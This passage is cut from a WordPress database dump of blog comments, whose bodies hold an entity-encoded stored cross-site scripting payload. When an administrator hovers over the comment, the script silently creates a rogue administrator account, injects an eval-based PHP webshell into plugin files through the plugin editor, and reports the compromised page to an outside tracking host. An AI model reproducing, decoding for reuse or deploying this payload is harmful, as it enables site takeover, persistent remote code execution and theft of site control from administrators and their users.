32;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(151, 1, 'Luo', 'vpdwddmd@gmail.com', 'http://www.facebook.com/pwinllhapnte2e', '160.16.124.138', '2015-11-12 14:16:07', '2015-11-12 14:16:07', 'Hi nice ar fGwb<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&